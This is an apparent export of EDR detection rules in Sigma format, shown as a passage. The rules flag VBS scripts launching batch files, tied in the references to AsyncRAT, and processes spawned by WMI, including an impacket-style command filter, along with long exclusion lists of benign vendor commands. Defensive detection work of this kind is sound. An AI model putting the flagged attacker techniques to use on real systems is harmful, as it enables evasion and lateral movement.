https://www.netskope.com/fr/blog/asyncrat-using-fully-undetected-downloader\n - https://blog.talosintelligence.com/asyncrat-3losh-update/\n - https://attack.mitre.org/techniques/T1059/005/\n - https://attack.mitre.org/techniques/T1547/\ndate: 2023/05/17\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.005\n - attack.persistence\n - attack.t1547\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.VBScript\n - classification.Windows.LOLBin.WScript\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_context:\n ParentImage|endswith: '\\WScript.exe'\n Image|endswith: '\\cmd.exe'\n CommandLine|contains:\n - '.bat'\n - '.cmd'\n CurrentDirectory:\n - '?:\\windows\\\\*'\n - '?:\\ProgramData\\\\*'\n - '?:\\PerfLogs\\\\*'\n - '?:\\temp\\\\*'\n - '?:\\users\\\\*'\n - '?:\\\\?Recycle.Bin\\\\*'\n - '?:\\'\n\n filter_cmd:\n CommandLine|startswith:\n - '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\'\n - '?:\\WINDOWS\\SysWOW64\\cmd.exe /c ?:\\'\n\n selection_cmd:\n CommandLine|contains:\n - '\\cmd.exe /c ?:\\windows\\'\n - '\\cmd.exe /c ?:\\ProgramData\\'\n - '\\cmd.exe /c ?:\\PerfLogs\\'\n - '\\cmd.exe /c ?:\\temp\\'\n - '\\cmd.exe /c ?:\\users\\'\n - '\\cmd.exe /c ?:\\\\?Recycle.Bin\\'\n\n # Group or network policies, exanple:\n # Parent: WScript.exe \\\\networkexample.local\\SysVol\\networkexample\\Policies\\[...]\n # Child: cmd.exe /c \\\\networkexample.local\\netlogon\\cert\\printer.bat\n\n # Netlogon is a Windows Server procedure allowing users\n # and other domain services to authenticate.\n # Scripts are commonly placed here to execute tasks upon user logins.\n exclusion_policies:\n ParentCommandLine|contains:\n - '\\\\\\\\*\\SysVol\\\\*\\Logon\\\\*.vbs'\n - '\\\\\\\\*\\SysVol\\\\*\\Policies\\\\*.vbs'\n - '\\\\\\\\*\\netlogon\\\\*.vbs'\n CommandLine|contains:\n - '\\\\\\\\*\\SysVol\\\\*\\Logon\\\\*.vbs'\n - '\\\\\\\\*\\SysVol\\\\*\\Scripts\\\\*.cmd'\n - '\\\\\\\\*\\SysVol\\\\*\\Scripts\\\\*.bat'\n - '\\\\\\\\*\\SysVol\\\\*\\Policies\\\\*.cmd'\n - '\\\\\\\\*\\SysVol\\\\*\\Policies\\\\*.bat'\n - '\\\\\\\\*\\netlogon\\\\*.cmd'\n - '\\\\\\\\*\\netlogon\\\\*.bat'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n # Tasks used by Intel QUEENCREEK/WILLAMETTE for installing drivers.\n exclusion_intel_queencreek:\n ParentCommandLine|endswith:\n - '\\Intel\\SUR\\QUEENCREEK\\x64\\task.vbs'\n - '\\Intel\\SUR\\WILLAMETTE\\ESRV\\task.vbs'\n CommandLine|endswith:\n - '\\Intel\\SUR\\QUEENCREEK\\x64\\task.bat'\n - '\\Intel\\SUR\\WILLAMETTE\\ESRV\\task.bat'\n\n exclusion_adaudit_plus:\n ParentCommandLine|contains: '\\ManageEngine\\ADAudit Plus\\bin\\AlertMe.vbs'\n CommandLine|contains: '\\ManageEngine\\ADAudit Plus\\bin\\servicemonitor.bat '\n\n exclusion_fiducial:\n ParentCommandLine|contains: '\\AppData\\Roaming\\FIDUCIAL\\compta\\tmp\\Backup*.vbs'\n CommandLine|contains: '\\AppData\\Roaming\\FIDUCIAL\\compta\\tmp\\Backup*.bat'\n\n exclusion_cisco_asdm:\n ParentCommandLine|endswith: 'invisible.vbs run.bat'\n CommandLine|endswith: '\\Cisco Systems\\ASDM\\run.bat'\n\n exclusion_glims:\n ParentCommandLine|endswith:\n - 'glims8\\lbin\\test_backup.vbs'\n - 'glims8\\lbin\\new_purge_ai.vbs'\n CommandLine|endswith:\n - '\\bin\\proutil.bat genrw -C describe | findstr /C:Last Full Backup'\n - '\\bin\\proutil.bat glims -C describe | findstr /C:Last Full Backup'\n\n exclusion_serpro_gov_br:\n ParentCommandLine|endswith: 'Assinador Serpro\\exec_assinador.vbs'\n CommandLine|endswith: 'signerDesktopAgent.bat'\n\n exclusion_usb_burning:\n ParentCommandLine|contains: '\\OEgetPriv_usb_burning_tool.vbs'\n CommandLine|endswith: '\\usb_burning_tool.bat'\n\n exclusion_affymetrix:\n - ParentCommandLine|contains: '\\Program Files\\Affymetrix\\ChAS\\ChAS.vbs'\n - CommandLine|contains: '\\Program Files\\Affymetrix\\ChAS\\ChAS.bat'\n\n exclusion_nicesoft:\n ParentCommandLine|contains|all:\n - 'Nicesoft\\invisible.vbs'\n - 'launch_CRC55v2.bat'\n CommandLine|endswith: '\\Nicesoft\\launch_CRC55v2.bat'\n\n exclusion_y_soft:\n ParentCommandLine|contains: '\\Y Soft\\SafeQ Client\\hide.js'\n CommandLine|contains: '\\Y Soft\\SafeQ Client\\after_installation.bat'\n\n exclusion_eton_pro:\n ParentCommandLine|contains|all:\n - '\\eTonPro\\invisible.vbs'\n - '\\eTonPro\\agent.bat'\n CommandLine|endswith: '\\eTonPro\\agent.bat'\n\n exclusion_yaw_cam:\n ParentCommandLine|endswith: 'start.vbs start.bat'\n CommandLine|endswith:\n - '\\Yawcam\\start.bat'\n - '\\Yawcam\\start_java_test.bat'\n\n exclusion_zenidoc:\n ParentCommandLine|endswith: '\\zenidoc\\getusersbgn.vbs'\n CommandLine|endswith: '\\Zenidoc\\SQLInputAD.bat'\n\n exclusion_citrix:\n ParentCommandLine|contains: '\\Yansys\\SYSEO Wrapper\\SYSEO_Citrix_Hide_Window.vbs'\n CommandLine|contains: '\\Yansys\\SYSEO Wrapper\\SYSEO_Citrix_Loop.cmd'\n\n exclusion_remote:\n ParentCommandLine: '?:\\Windows\\System32\\WScript.exe \\\\\\\\*'\n\n exclusion_schedule:\n - ParentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - GrandparentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n exclusion_ccm:\n - CommandLine|startswith: '?:\\WINDOWS\\System32\\cmd.exe /c ?:\\Windows\\ccmcache\\'\n - CurrentDirectory|startswith: '?:\\WINDOWS\\ccmcache\\'\n - ProcessAncestors|contains: '?:\\Windows\\ccmcache\\'\n\n exclusion_desktop:\n CommandLine|startswith: '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\Users\\\\*\\Desktop\\\\*'\n\n condition: selection_context and (not filter_cmd or selection_cmd) and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "613c9778-02e2-4a21-b3ee-cbad7550f413",
"rule_name": "Suspicious Execution of Batch or Command File by VBS Script",
"rule_description": "Detects a suspicious execution of a Batch or Command file from a VBS script.\nThis execution tree is often exploited by attackers as a way to evade defenses and load malware.\nDue to nature of these scripts, we have excluded some common paths where these scripts may be placed.\nIf you wish to investigate persistence in your network through this method in paths that aren't covered by this rule, you may investigate the scripts present in the paths excluded.\nIt is recommended to create a job to download the different scripts associated with this process tree, and investigate them for malicious content.\nIt is also recommended to create whitelists for this rule, as these scripts may also be used by system administrators to automate certain tasks and cause false positives.\nAn investigative guide is also present in the first link of references.\n",
"rule_creation_date": "2023-05-17",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1059.005",
"attack.t1547"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "61760ce9-0e79-4360-81e4-a0c50dab9c8c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619715Z",
"creation_date": "2026-03-23T11:45:34.619717Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619721Z",
"rule_level": "high",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1047/"
],
"name": "t1047_wmi_process_execution.yml",
"content": "title: Possible Lateral Movement via WMI\nid: 61760ce9-0e79-4360-81e4-a0c50dab9c8c\ndescription: |\n Detects processes spawned by the Windows Management Instrumentation (WMI) service, specifically when the parent process is \"wmiprvse.exe\".\n WMI is a legitimate management tool used for system administration, but attackers may abuse this mechanism for lateral movement, persistence, or to execute malicious commands. This rule focuses on detecting potentially malicious use by monitoring the spawned processes.\n It is recommended to review the actions of the child processes to identify any suspicious activities and to verify if the processes align with legitimate management tasks.\nreferences:\n - https://attack.mitre.org/techniques/T1047/\ndate: 2020/09/28\nmodified: 2026/02/16\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.lateral_movement\n - attack.t1047\n - attack.t1059.001\n - attack.t1059.005\n - attack.t1059.007\n - attack.persistence\n - attack.t1546.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ParentImage|endswith: '\\wmiprvse.exe'\n\n # This is handled by the rule c110eda5-b1c7-4bb4-9a9d-8a48bcc98222\n filter_impacket:\n ProcessImage: '*\\cmd.exe'\n CommandLine|re: '.* [/-]Q [/-]c .*'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\program files\\'\n - '?:\\program files (x86)\\'\n\n exclusion_image:\n Image:\n - '?:\\Windows\\winsxs\\\\*'\n - '?:\\WINDOWS\\system32\\msiexec.exe'\n - '?:\\Windows\\System32\\gpupdate.exe'\n - '?:\\WINDOWS\\system32\\WerFault.exe'\n - '?:\\WINDOWS\\syswow64\\WerFault.exe'\n - '?:\\windows\\system32\\shutdown.exe'\n - '?:\\windows\\system32\\wusa.exe'\n - '?:\\Windows\\System32\\wdsutil.exe'\n - '?:\\Windows\\System32\\Robocopy.exe'\n - '?:\\windows\\system32\\spool\\drivers\\x64\\3\\kdsinst.exe' # Kyocera\n - '?:\\windows\\system32\\inetsrv\\appcmd.exe'\n - '?:\\Windows\\System32\\wbem\\mofcomp.exe'\n - '?:\\Windows\\SysWOW64\\wbem\\mofcomp.exe'\n - '?:\\Windows\\System32\\changepk.exe'\n - '?:\\Windows Kits\\10\\Assessment and Deployment Kit\\Deployment Tools\\amd64\\DISM\\\\*'\n - '?:\\Windows\\System32\\powercfg.exe'\n - '?:\\Windows\\SysWOW64\\powercfg.exe'\n - '?:\\Windows\\System32\\Dism.exe'\n - '?:\\Windows\\System32\\Dism\\DismHost.exe'\n\n exclusion_ccm:\n - CommandLine|contains:\n - '?:\\WINDOWS\\CCM\\'\n - '?:\\WINDOWS\\ccmcache\\'\n - '?:\\CCM\\cache\\'\n - '?:\\Program Files\\SMS_CCM\\SystemTemp\\'\n - '?:\\SMS_CCM\\SystemTemp\\'\n - '?:\\SMS_CCM\\SignedScripts\\'\n - ' ?:\\SMS_CCM\\'\n - '?:\\SCCM\\SystemTemp\\'\n - '\\\\\\\\*\\\\*$\\SCCM\\'\n - Image|contains:\n - '\\windows\\CCM\\'\n - '\\windows\\ccmcache\\'\n - CurrentDirectory:\n - '?:\\WINDOWS\\CCM'\n - '?:\\WINDOWS\\ccmcache'\n - '?:\\WINDOWS\\CCM\\'\n - '?:\\WINDOWS\\ccmcache\\'\n - '?:\\WINDOWS\\CCM\\\\*'\n - '?:\\WINDOWS\\ccmcache\\\\*'\n - '?:\\CCM\\cache\\'\n - '?:\\temp\\ccmcache\\\\*'\n\n exclusion_officeaddin:\n CommandLine: 'regsvr32 /s /n /i:OnPrinterAccess ?:\\Windows\\system32\\spool\\DRIVERS\\x64\\3\\UDCOfficeAddin200?.dll'\n\n exclusion_dismhost:\n # C:\\Windows\\TEMP\\C4460A5F-41D2-4AF8-93ED-C798D5EA5DCF\\dismhost.exe {8B671A1D-057F-4726-8F92-F96A85B0B3D1}\n # C:\\TEMP\\D151D5A1-C293-4EA4-BCA9-3560C4E7255F\\dismhost.exe {65F42C8B-5DC0-4024-AFEC-01F734190E5F}\n # C:\\Temps\\5B2118D0-183C-4838-8331-87EEE4AC4FA5\\DismHost.exe\n Image:\n - '?:\\windows\\temp\\\\????????-????-????-????-????????????\\dismhost.exe'\n - '?:\\temp\\\\????????-????-????-????-????????????\\dismhost.exe'\n - '?:\\temps\\\\????????-????-????-????-????????????\\dismhost.exe'\n\n exclusion_wmiprvse:\n CommandLine:\n - '?:\\windows\\system32\\wbem\\wmiprvse.exe -embedding'\n - '?:\\WINDOWS\\system32\\wbem\\wmiprvse.exe -secured -Embedding'\n - '?:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe -Embedding'\n - '?:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding'\n\n exclusion_konica_minolta:\n # commandline :\n # /a \"c:\\windows\\system32\\spool\\drivers\\w32x86\\3\\kob__j_2.7z\" /o \"c:\\programdata\\konica minolta\\kmupdcache\\x86_280\\pcl\\\" /m \"com-pcl-bf03\" /i \"model.ini\" /d \"c:\\programdata\\konica minolta\\kmupdcache\\x86_280\\pcl\\kob__j_3\\7zdll\\x86\\7z.dll\"\n # /a C:\\WINDOWS\\system32\\spool\\DRIVERS\\x64\\3\\KOB__A_2.cab /o C:\\Users\\xxxx\\AppData\\Roaming\\KONICA MINOLTA\\UniversalDriver\\x64\\models\" /m com-ps /i model.ini\n # image:\n # ?:\\windows\\system32\\spool\\drivers\\w32x86\\3\\kob__j_3.exe\n # ?:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOB__A_3.EXE\n Image: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KOB__?_3.EXE'\n CommandLine|contains:\n - '\\programdata\\konica minolta\\kmupdcache'\n - '\\AppData\\Roaming\\KONICA MINOLTA\\'\n - '\\kmupdcache'\n\n exclusion_wimserv:\n Image: '?:\\Windows\\System32\\wimserv.exe'\n CommandLine: 'wimserv.exe ????????-????-????-????-????????????'\n\n exclusion_iis_or_exchange_update:\n # 2022/10/02 : seen a lot after ProxyNotShell vuln was released, probably related to patching / workaournd of the vuln\n # C:\\Windows\\system32\\cmd.exe /c C:\\Windows\\system32\\inetsrv\\appcmd.exe set config Default Web Site/TOKENAUTH_SMS_DP_SMSSIG$ /section:directoryBrowse /enabled:true /commit:apphost\n # C:\\Windows\\system32\\cmd.exe /c C:\\Windows\\system32\\inetsrv\\appcmd.exe set config Default Web Site/TOKENAUTH_SMS_DP_SMSSIG$ -section:system.webServer/staticContent /+[fileExtension = '.*', mimeType = 'DP_ALL_FILETYPES'] /commit:apphost\n # C:\\Windows\\system32\\cmd.exe /c C:\\Windows\\system32\\inetsrv\\appcmd.exe ADD App /site.name:Default Web Site /path:/TOKENAUTH_SMS_DP_SMSSIG$ /physicalPath:F:\\SMSSIG$ /app.name:TOKENAUTH_SMS_DP_SMSSIG$\n # C:\\Windows\\system32\\cmd.exe /c C:\\Windows\\system32\\inetsrv\\appcmd.exe delete app /app.name:Default Web Site/NOCERT_CCMTOKENAUTH_SMS_DP_SMSSIG$\n # C:\\Windows\\system32\\cmd.exe /c C:\\Windows\\system32\\inetsrv\\appcmd.exe set config -section:system.webServer/security/applicationDependencies /+[name = 'SMS Distribution Point', groupId = 'SMS_DP'] /commit:apphost\n # C:\\Windows\\system32\\cmd.exe /c C:\\Windows\\system32\\inetsrv\\appcmd.exe set app /app.name:Default Web Site/CCMTOKENAUTH_SMS_DP_SMSSIG$ /applicationPool:SMS Distribution Points Pool /commit:apphost\n CommandLine|startswith: '?:\\Windows\\system32\\cmd.exe /c ?:\\Windows\\system32\\inetsrv\\appcmd.exe'\n\n exclusion_restarthealthservice_js:\n # https://systemcenter.wiki/?GetElement=Microsoft.SystemCenter.AgentManagement.RestartHealthServiceAction&Type=WriteActionModuleType&ManagementPack=Microsoft.SystemCenter.2007&Version=6.1.7695.0\n # c:\\windows\\system32\\cmd.exe /c cscript.exe c:\\windows\\temp\\restarthealthservice.js 1 60\n # c:\\windows\\system32\\cmd.exe /c cscript.exe c:\\temp\\restarthealthservice.js 1 60\n Image: '?:\\windows\\system32\\cmd.exe'\n CommandLine|contains|all:\n - 'cscript.exe '\n - '\\temp\\restarthealthservice.js '\n\n exclusion_restarthealthservice_ps1:\n # powershell.exe -ExecutionPolicy Unrestricted C:\\Windows\\TEMP\\RestartHealthService.ps1 1 60\n Image: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n CommandLine|contains|all:\n - ' Unrestricted '\n - '\\TEMP\\RestartHealthService.ps1 '\n\n exclusion_citrix:\n Image|endswith: '\\CtxSession.exe'\n Signed: 'true'\n Signature: 'Citrix Systems, Inc.'\n\n exclusion_stratoprobe:\n # cmd /c C:\\temp\\StratoProbe\\538834ED5E5A4AF1BC45D07F714BFFD1\\stratoStat.bat\n # cmd /c rd C:\\temp\\StratoProbe\\F4C7873327D24F6C9AA8499337A90320\n # cmd /c del C:\\temp\\StratoProbe\\C55C1EA5417F4A599C66220D15748DFD\\*.bat\n # cmd /c del C:\\temp\\StratoProbe\\538834ED5E5A4AF1BC45D07F714BFFD1\\*.txt\n # cmd /c (echo ^setlocal enabledelayedexpansion) >> C:\\temp\\StratoProbe\\36B0863655D14B9FAEDABB0F0082D6DB\\stratoStat.bat\n # cmd /c (echo for /f delims= %%^i in ^(^!textfile^!^) do ^() >> C:\\temp\\StratoProbe\\36B0863655D14B9FAEDABB0F0082D6DB\\stratoStat.bat\n # cmd /c (echo set line=!line: =~!) >> C:\\temp\\StratoProbe\\36B0863655D14B9FAEDABB0F0082D6DB\\stratoStat.bat\n # cmd /c (echo set /a counter=counter+1) >> C:\\temp\\StratoProbe\\1743B701DCB242C1952F6809EF249E78\\stratoStat.bat\n # cmd /c (echo cls && echo cls) > C:\\temp\\StratoProbe\\4876911C42784D3FA87A3BA900FF64D7\\stratoStat.bat\n # cmd /c md C:\\temp\\StratoProbe\\36B0863655D14B9FAEDABB0F0082D6DB\n CommandLine:\n - 'cmd /c ?:\\temp\\StratoProbe\\\\????????????????????????????????\\stratoStat.bat'\n - 'cmd /c rd ?:\\temp\\StratoProbe\\\\????????????????????????????????'\n - 'cmd /c md ?:\\temp\\StratoProbe\\\\????????????????????????????????'\n - 'cmd /c del ?:\\temp\\StratoProbe\\\\????????????????????????????????\\\\?.bat'\n - 'cmd /c del ?:\\temp\\StratoProbe\\\\????????????????????????????????\\\\?.txt'\n - '* >> ?:\\temp\\StratoProbe\\\\????????????????????????????????\\stratoStat.bat'\n - '* > ?:\\temp\\StratoProbe\\\\????????????????????????????????\\stratoStat.bat'\n\n exclusion_netwrix:\n CommandLine:\n - 'netsh.exe advfirewall firewall add rule name=Netwrix Remote Event Log Management (RPC-EPMAP) description=Inbound rule for the RPCSS service to allow RPC/TCP traffic for the local Event Log Service. profile=Private,Public,Domain enable=yes action=allow dir=in protocol=tcp localport=RPC-EPMap service=Eventlog program=%SystemRoot%\\system32\\svchost.exe'\n - 'netsh.exe advfirewall firewall add rule name=Netwrix Remote Event Log Management (RPC) description=Inbound rule for the local Event Log service to be remotely managed via RPC/TCP. profile=Private,Public,Domain enable=yes action=allow dir=in protocol=tcp localport=RPC service=Eventlog program=%SystemRoot%\\system32\\svchost.exe'\n - 'netsh.exe advfirewall firewall add rule name=Netwrix Remote Event Log Management (NP-In) description=Inbound rule for the local Event Log service to be remotely managed over Named Pipes. profile=Private,Public,Domain enable=yes action=allow dir=in protocol=tcp localport=445 service=Eventlog program=System'\n - 'netsh.exe advfirewall firewall delete rule name=Netwrix Remote Event Log Management (RPC-EPMAP)'\n - 'netsh.exe advfirewall firewall delete rule name=Netwrix Remote Event Log Management (RPC)'\n - 'netsh.exe advfirewall firewall delete rule name=Netwrix Remote Event Log Management (NP-In)'\n\n exclusion_conhost:\n Image: '?:\\Windows\\System32\\conhost.exe'\n # \\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1\n CommandLine|endswith:\n - ':\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1'\n - ':\\Windows\\system32\\conhost.exe 0x4'\n\n exclusion_solarwinds:\n CommandLine:\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\WINDOWS\\Temp\\\\????????-????-????-????-????????????\\GetPendingUpdates_vbs.CMD'\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\WINDOWS\\Temp\\\\????????-????-????-????-????????????\\GetUpdateDates_vbs.CMD'\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\Users\\\\*\\AppData\\Local\\Temp\\\\????????-????-????-????-????????????\\GetPendingUpdates_vbs.CMD'\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\Users\\\\*\\AppData\\Local\\Temp\\\\????????-????-????-????-????????????\\GetUpdateDates_vbs.CMD'\n\n exclusion_microsoft_assessment:\n CommandLine:\n - 'cmd.exe /Q /c chcp * & reg query HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall * > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c chcp * & reg query HKLM\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall * > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c cmd.exe /c dir ?:\\\\programdata\\\\regid* /b /s > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c cmd.exe /c hostname > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c cmd.exe /c mode con: cols=4096 | echo . | powershell.exe -EncodedCommand * > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c cmd.exe /c reg query HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\* > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c cmd.exe /c reg query HKEY_LOCAL_MACHINE\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Microsoft SQL Server /S > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c cmd.exe /c reg query HKLM\\\\SOFTWARE\\\\Classes\\\\Local Settings\\\\Software\\\\Microsoft\\\\Windows\\\\* > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c cmd.exe /c reg query HKLM\\\\Software\\\\Microsoft\\\\Internet Explorer > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c cmd.exe /c ver > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c cmd.exe /c wmic logicaldisk get Name, DriveType, FileSystem, Size, FreeSpace, VolumeSerialNumber /format:list > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c cmd.exe /c wmic /namespace:\\\\\\\\root\\\\cimv2\\\\security\\\\microsofttpm path win32_tpm get * /format:list > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c cmd.exe /c wmic path Win32_TSLicenseServer get ServerRole /format:list > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c cmd.exe /c wmic qfe get Hotfixid /format:list > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c netsh trace start capture=yes report=disabled filemode=circular overwrite=yes maxSize=4 > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c netsh trace stop > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c reg query HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Edge\\\\BLBeacon /S > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c reg query HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\* > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c reg query HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c reg query HKLM\\\\Software\\\\Microsoft\\\\Internet Explorer /reg:64 /S > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c reg query HKLM\\\\Software\\\\Microsoft\\\\Microsoft SQL Server * > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c reg query HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\* > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c reg query HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender * > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c reg query HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c wmic /namespace:\\\\\\\\root\\\\wmi path MS_SystemInformation get SystemProductName,SystemSKU,SystemVersion /format:list > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c wmic path win32_PointingDevice get \\* /format:list > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c wmic path win32_VideoController get \\* /format:list > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n - 'cmd.exe /Q /c wmic systemenclosure get ChassisTypes /format:list > \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__?????????????????? 2>&1'\n\n exclusion_sms_dp:\n CommandLine:\n - 'regsvr32.exe ?:\\SMS_DP$\\sms\\bin\\smsdp.dll /s'\n - '?:\\SMS_DP$\\sms\\bin\\vcredist_x64.exe /q /norestart /log ?:\\SMS_DP$\\sms\\bin\\vcredist.log'\n\n exclusion_activebackup:\n # C:\\Users\\Administrateur\\AppData\\Local\\ActiveBackup\\49449e525dcf884caba4dc05e19a3262\\2.4.0-0023\\hyperv_helper.exe\n # C:\\Users\\Administrateur\\AppData\\Local\\ActiveBackup\\14b889f7d2adc9c0344402969f164026\\2.4.0-0023\\hyperv_helper.exe\n Image: '*\\AppData\\Local\\ActiveBackup\\\\*\\hyperv_helper.exe'\n Signed: 'true'\n Signature: 'Synology Inc.'\n\n # maybe atlassian\n exclusion_disco_remote:\n # cmd.exe /c echo FOR /F tokens=* USEBACKQ %%F IN (`!_cmd!`) DO ( >> %userprofile%\\discoRemote.cmd\n # cmd.exe /c echo ) >> %userprofile%\\discoRemote.cmd\n # cmd.exe /c echo SETLOCAL ENABLEDELAYEDEXPANSION >> %userprofile%\\discoRemote.cmd\n # cmd.exe /c echo @ECHO OFF >> %userprofile%\\discoRemote.cmd\n # cmd.exe /c echo ENDLOCAL >> %userprofile%\\discoRemote.cmd\n # cmd.exe /c echo SET output=!output:=\"! >> %userprofile%\\discoRemote.cmd\n # cmd.exe /c echo reg add HKLM\\SOFTWARE\\Discovery-Tool /v OutStr!count! /t REG_MULTI_SZ /f /d !output! >> %userprofile%\\discoRemote.cmd\n # cmd.exe /c echo SET output=%%F >> %userprofile%\\discoRemote.cmd\n # cmd.exe /c echo SET /a count=!count!+1 >> %userprofile%\\discoRemote.cmd\n # cmd.exe /c echo SET count=100000 >> %userprofile%\\discoRemote.cmd\n # cmd.exe /c echo SET _cmd=sqlcmd -E -Q ^SELECT DB.name, SUM(CASE WHEN type = 0 THEN MF.size * 8 / 1024 ELSE 0 END) AS DataFileSizeMB, SUM(CASE WHEN type = 1 THEN MF.size * 8 / 1024 ELSE 0 END) AS LogFileSizeMB, @@servicename AS InstanceName, (SELECT TOP 1 local_tcp_port FROM sys.dm_exec_connections WHERE local_tcp_port IS NOT NULL ORDER BY last_read DESC) AS Port FROM sys.master_files MF JOIN sys.databases DB ON DB.database_id = MF.database_id GROUP BY DB.name^ >> %userprofile%\\discoRemote.cmd\n CommandLine:\n - 'cmd.exe /c echo *>> %userprofile%\\discoRemote.cmd'\n - 'cmd.exe 